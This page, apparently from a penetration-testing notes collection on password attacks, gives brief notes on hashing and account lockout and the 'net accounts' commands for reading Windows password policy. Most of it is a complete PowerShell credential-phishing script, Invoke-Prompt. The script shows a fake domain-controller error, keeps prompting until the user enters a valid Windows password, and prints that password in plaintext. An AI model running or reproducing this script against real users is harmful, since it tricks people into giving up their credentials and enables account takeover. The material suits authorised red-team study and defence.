Password Attacks
File hashing should be fast - used to determine integrity
Password hashing should be SLOW - used to increase amount of work for cracking
Be careful not to lock out legitimate users, as this will impact operational needs of the target
Check windows password settings
1
net accounts
2
net accounts /domain
Copied!
Sometimes, we can just ask for creds!
1
# POC from greg.foss[at]owasp.org
2
# @enigma0x3
3
# Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
4
# https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
5
​
6
function Invoke-Prompt {
7
[CmdletBinding()]
8
Param (
9
[Switch] $ProcCreateWait,
10
[String] $MsgText = 'Lost contact with the Domain Controller.',
11
[String] $IconType = 'Critical',
12
[String] $Title = 'ERROR - 0xA801B720'
13
)
14
Add-Type -AssemblyName Microsoft.VisualBasic
15
Add-Type -assemblyname System.DirectoryServices.AccountManagement
16
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
17
18
if($MsgText -and $($MsgText -ne '')){
19
$null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title)
20
}
21
22
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
23
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
24
25
if($credential){
26
while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True){
27
$credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
28
}
29
"[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password
30
}
31
else{
32
"[!] User closed credential prompt"
33
}
34
}
Copied!
​
Last modified 10mo ago
Copy link